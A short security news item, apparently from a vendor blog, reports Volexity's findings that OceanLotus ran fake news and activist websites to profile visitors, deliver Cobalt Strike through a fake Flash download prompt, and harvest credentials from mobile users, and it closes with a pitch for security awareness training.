Researchers at Volexity report that the Vietnamese threat actor OceanLotus has been using phony news and bogus activist websites to track users, or to trick them into downloading malware. Notably, the websites were convincing enough that the researchers initially thought they were legitimate news sites that had been compromised by a threat actor. Additionally, most of the content on the sites was harmless, containing thousands of articles scraped from legitimate news outlets, with only certain articles containing malicious redirects.
“However, upon closer inspection of the websites, Volexity found the sites were not compromised, instead they were created and operated by OceanLotus,” the researchers write. “Each of the websites appears to have had a decent level of effort to build it, as there are numerous variations in themes, content, and even custom images and slogans. The websites all claim to be news sites and contain a great deal of benign content, with no malicious redirects or profiling in place on the vast majority of pages including the main index page. Instead, generally speaking, only a handful of specific articles within each site contain malicious content.”
The researchers believed users were directed to these malicious pages via links in spear phishing emails and social media messages. The sites also acted as watering holes, allowing the threat actor to collect information on users who were interested in certain topics and found the sites on their own.
The pages would collect information about visitors and, in some cases, attempt to trick the user into installing malware. For example, one of the pages used JavaScript to show a video player trying to load a news video before displaying an error. The user would then be told they needed to download Flash in order to play the video. If the user clicked the download button, they’d be infected with the Cobalt Strike hacking tool.
Interestingly, if the same page detected that the user was on a mobile device, it would instead inform them that they needed to sign in to confirm their age before viewing the video. If the user clicked the button to sign in, they’d be taken to a credential-harvesting page.
New-school security awareness training can help your employees maintain a healthy sense of suspicion even when they’re not expecting to be attacked.
Volexity has the story.
Here's how it works:
